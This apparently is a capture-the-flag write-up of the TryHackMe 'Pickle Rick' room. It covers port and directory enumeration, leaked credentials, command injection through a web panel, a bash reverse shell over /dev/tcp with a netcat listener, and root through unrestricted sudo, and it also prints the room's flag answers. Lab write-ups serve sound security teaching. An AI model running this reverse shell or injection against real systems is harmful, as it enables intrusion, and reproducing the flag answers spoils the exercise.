Introduction
Hey, folks with you volk in this writeup we are going to solve and explain Pickle Rick Challenge on TryHackMe.
The difficulty of challenge is a beginner-level challenge.
Tools Used
Enumeration
First, I Scanned the target using Nmap to know the open ports, OS, Version, etc… by the following command:
nmap -A [Machine_IP]
-A: OS detection, Script Scanning, Version detection, and traceroute
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 bc:c7:d4:7c:21:45:0d:24:d1:30:3a:49:bf:76:5e:ed (RSA)
| 256 88:d5:bc:e4:d2:ef:2a:09:0f:e8:17:95:09:aa:46:77 (ECDSA)
|_ 256 d5:bb:c3:48:97:21:55:2b:70:76:2e:07:4a:bf:70:37 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Lets check port 80 (HTTP)
nothing important So i decided to check the source code
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
<style>
.jumbotron {
background-image: url("assets/rickandmorty.jpeg");
background-size: cover;
height: 340px;
}
</style>
</head>
<body>
<div class="container">
<div class="jumbotron"></div>
<h1>Help Morty!</h1></br>
<p>Listen Morty... I need your help, I've turned myself into a pickle again and this time I can't change back!</p></br>
<p>I need you to <b>*BURRRP*</b>....Morty, logon to my computer and find the last three secret ingredients to finish my pickle-reverse potion. The only problem is,
I have no idea what the <b>*BURRRRRRRRP*</b>, password was! Help Morty, Help!</p></br>
</div>
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
</body>
</html>
nice we found a username that is leaked in the source code, We will need it after that,I usually check the
robots.txt sometimes there is important information on this page, When I accessed I found a word and I guess
that’s the password
Now let’s make a brute force directory using gobuster
gobuster dir -u http://10.10.42.251/ -w /usr/share/dirb/wordlists/common.txt -x php,html 2
dir: use directory brute force
-u: to specify the target URL
-w: to specify the path of the wordlist you want to use
-x to brute force directory /2100 and at the end of the file, the extension will be .php,html
that’s the result:
===============================================================
/.hta.php (Status: 403) [Size: 295]
/.hta.html (Status: 403) [Size: 296]
/.hta (Status: 403) [Size: 291]
/.htaccess.php (Status: 403) [Size: 300]
/.htpasswd (Status: 403) [Size: 296]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd.php (Status: 403) [Size: 300]
/.htaccess.html (Status: 403) [Size: 301]
/.htpasswd.html (Status: 403) [Size: 301]
/assets (Status: 301) [Size: 313] [--> http://10.10.42.251/assets/]
/denied.php (Status: 302) [Size: 0] [--> /login.php]
/index.html (Status: 200) [Size: 1062]
/index.html (Status: 200) [Size: 1062]
/login.php (Status: 200) [Size: 882]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/robots.txt (Status: 200) [Size: 17]
/server-status (Status: 403) [Size: 300]
===============================================================
So I found a login directory (login.php)
I Tried the username and the password that I Found.
Username: R1ckRul3s
Password: Wubbalubbadubdub
And it worked 🙂
When I Saw command panel first thing come to my mind is command injection so I decided to type ls
It Worked but when I try to use the cat command to cat any text file I got a message saying that
the command is disabled (cat)
Gaining Access
I decided to use this bash reverse shell.
bash -c 'exec bash -i &>/dev/tcp/IP/PORT <&1'
And use Netcat to listen for any coming connections
nc -lvp (PORT)
-l : to listen for any coming connections (listen mode)
-v : verbose
-p : to choose the port you want to listen on for example: 1337
and we got connection, Now we can run cat command
www-data@ip-10-10-42-251:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
mr. meeseek hair
By reading Sup3rS3cretPickl3Ingred.txt file, we answered the first question
And I Found the second ingredient in /home/rick directory
$ cd /home/rick
$ ls
second ingredients
$ cat "/home/rick/second ingredients"
1 jerry tear
By reading second ingredients file, we answered the second question
Privilege Escalation
Usually, the last flag (in this challenge its ingredients) is in the root directory
so let’s try sudo -l to see the commands that can be executed by this user as root
Matching Defaults entries for www-data on
ip-10-10-42-251.eu-west-1.compute.internal:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on
ip-10-10-42-251.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
Surprisingly We can use any sudo command, So let’s type sudo su to be root and change directory to root
to access the last file
$ sudo su
#cd /root
#ls
3rd.txt
snap
#cat 3rd.txt
3rd ingredients: fleeb juice
And we got the root flag (Last flag) :), Thanks For reading the writeup see you in the next writeup